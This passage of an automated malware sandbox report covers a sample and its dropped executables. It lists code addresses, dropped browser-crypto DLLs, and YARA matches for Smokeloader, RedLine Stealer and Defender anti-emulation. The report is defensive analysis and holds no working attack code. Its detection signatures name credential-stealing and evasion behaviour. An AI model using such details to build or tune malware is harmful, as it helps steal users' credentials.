                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAD49F011_2_6CAD49F0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAF690011_2_6CAF6900
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAD896011_2_6CAD8960
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB1EA8011_2_6CB1EA80
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB58A3011_2_6CB58A30
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB4EA0011_2_6CB4EA00
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB1CA7011_2_6CB1CA70
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB40BA011_2_6CB40BA0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CBA6BE011_2_6CBA6BE0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CBCA48011_2_6CBCA480
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB3A4D011_2_6CB3A4D0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAE64D011_2_6CAE64D0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB2A43011_2_6CB2A430
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB0442011_2_6CB04420
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAB846011_2_6CAB8460
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CA945B011_2_6CA945B0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB2E5F011_2_6CB2E5F0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB6A5E011_2_6CB6A5E0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB4057011_2_6CB40570
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB0256011_2_6CB02560
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CBE855011_2_6CBE8550
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAF854011_2_6CAF8540
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CBA454011_2_6CBA4540
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAFE6E011_2_6CAFE6E0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB3E6E011_2_6CB3E6E0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAC46D011_2_6CAC46D0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAFC65011_2_6CAFC650
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CACA7D011_2_6CACA7D0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB2070011_2_6CB20700
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB7C0B011_2_6CB7C0B0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAB00B011_2_6CAB00B0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CA9809011_2_6CA98090
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB6801011_2_6CB68010
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB6C00011_2_6CB6C000
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAEE07011_2_6CAEE070
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAA01E011_2_6CAA01E0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB1613011_2_6CB16130
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB8413011_2_6CB84130
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB0814011_2_6CB08140
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CC262C011_2_6CC262C0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB6E2B011_2_6CB6E2B0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB722A011_2_6CB722A0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB7822011_2_6CB78220
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB6A21011_2_6CB6A210
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB2826011_2_6CB28260
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB3825011_2_6CB38250
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAD23A011_2_6CAD23A0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAFE3B011_2_6CAFE3B0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAF43E011_2_6CAF43E0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB1232011_2_6CB12320
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB3637011_2_6CB36370
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CBE237011_2_6CBE2370
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAA237011_2_6CAA2370
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CBBC36011_2_6CBBC360
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAA834011_2_6CAA8340
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB3FC8011_2_6CB3FC80
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB61CE011_2_6CB61CE0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CBDDCD011_2_6CBDDCD0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAB1C3011_2_6CAB1C30
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAA3C4011_2_6CAA3C40
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CBC9C4011_2_6CBC9C40
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CA93D8011_2_6CA93D80
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CBE9D9011_2_6CBE9D90
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB71DC011_2_6CB71DC0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB03D0011_2_6CB03D00
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAC3EC011_2_6CAC3EC0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CC25E6011_2_6CC25E60
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CBADE1011_2_6CBADE10
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CBFBE7011_2_6CBFBE70
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CC23FC011_2_6CC23FC0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAC1F9011_2_6CAC1F90
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB4BFF011_2_6CB4BFF0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CBBDFC011_2_6CBBDFC0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAD5F2011_2_6CAD5F20
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CA95F3011_2_6CA95F30
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CBF7F2011_2_6CBF7F20
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB7F8F011_2_6CB7F8F0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAAD8E011_2_6CAAD8E0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAD38E011_2_6CAD38E0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CBFB8F011_2_6CBFB8F0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB3F8C011_2_6CB3F8C0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAFD81011_2_6CAFD810
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB7384011_2_6CB73840
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB7199011_2_6CB71990
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAB198011_2_6CAB1980
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB059F011_2_6CB059F0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB379F011_2_6CB379F0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB399C011_2_6CB399C0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAD99D011_2_6CAD99D0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB5592011_2_6CB55920
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CBEF90011_2_6CBEF900
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB1F96011_2_6CB1F960
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB5D96011_2_6CB5D960
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB7DAB011_2_6CB7DAB0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAA1AE011_2_6CAA1AE0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB9DA3011_2_6CB9DA30
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CC29A5011_2_6CC29A50
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB41A1011_2_6CB41A10
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CADFA1011_2_6CADFA10
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB69BB011_2_6CB69BB0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAF9BA011_2_6CAF9BA0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB85B9011_2_6CB85B90
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CA91B8011_2_6CA91B80
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAE7BF011_2_6CAE7BF0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAEBB2011_2_6CAEBB20
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB7FB6011_2_6CB7FB60
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAA14E011_2_6CAA14E0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CC214A011_2_6CC214A0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB8943011_2_6CB89430
                Source: Joe Sandbox ViewDropped File: C:\ProgramData\FIEGCBKEGCFC\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                Source: Joe Sandbox ViewDropped File: C:\ProgramData\FIEGCBKEGCFC\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: String function: 004087A0 appears 54 times
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: String function: 00568A07 appears 57 times
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: String function: 0040F5A0 appears 139 times
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: String function: 0056F807 appears 139 times
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: String function: 6CAC9B10 appears 95 times
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: String function: 6CC2DAE0 appears 72 times
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: String function: 6CAC3620 appears 95 times
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: String function: 6CC2D930 appears 57 times
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: String function: 6CBD9F30 appears 52 times
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: String function: 6CAFC5E0 appears 35 times
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: String function: 6CC209D0 appears 303 times
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7932 -s 1512
                Source: 2.exe, 00000000.00000000.1664925218.0000000002C8C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesFilezera2 vs 2.exe
                Source: 2.exeBinary or memory string: OriginalFilenamesFilezera2 vs 2.exe
                Source: 2.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 10.2.D818.exe.4570000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 10.2.D818.exe.2560000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 10.2.D818.exe.4347719.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 10.2.D818.exe.2560000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 10.2.D818.exe.4347719.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 10.2.D818.exe.4570000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 00000010.00000002.3994207435.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000005.00000002.1969684642.0000000002E4B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.1740824715.0000000002E2B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000005.00000002.1969820013.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000005.00000002.1969542787.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000002.1740978999.00000000049F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000010.00000002.3994237528.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 0000000A.00000002.2306037473.0000000004570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 00000000.00000002.1740688964.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 0000000A.00000002.2305075541.0000000002560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 00000000.00000002.1740710634.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000010.00000002.3995067757.000000000302E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000010.00000002.3994385384.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000006.00000002.2346623744.00000000005DD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000005.00000002.1969780302.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/35@6/9
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB00300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,11_2_6CB00300
                Source: C:\Users\user\Desktop\2.exeCode function: 0_2_02E320A0 CreateToolhelp32Snapshot,Module32First,0_2_02E320A0
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_0042B20E CoCreateInstance,6_2_0042B20E
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jssrvvhJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7932
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\38F9.tmpJump to behavior
                Source: 2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\AppData\Local\Temp\D818.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: softokn3.dll.11.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                Source: katB4C0.tmp, 0000000B.00000002.2809673734.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2810931368.0000000020219000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmp, sqls[1].dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                Source: softokn3.dll.11.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                Source: katB4C0.tmp, 0000000B.00000002.2809673734.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2810931368.0000000020219000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmp, sqls[1].dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                Source: katB4C0.tmp, 0000000B.00000002.2809673734.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2810931368.0000000020219000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmp, sqls[1].dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                Source: katB4C0.tmp, 0000000B.00000002.2809673734.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2810931368.0000000020219000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmp, sqls[1].dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                Source: softokn3.dll.11.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                Source: katB4C0.tmp, 0000000B.00000002.2809673734.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2810931368.0000000020219000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.11.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                Source: softokn3.dll.11.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                Source: softokn3.dll.11.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                Source: softokn3.dll.11.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                Source: katB4C0.tmp, 0000000B.00000002.2809673734.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2810931368.0000000020219000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.11.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                Source: softokn3.dll.11.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
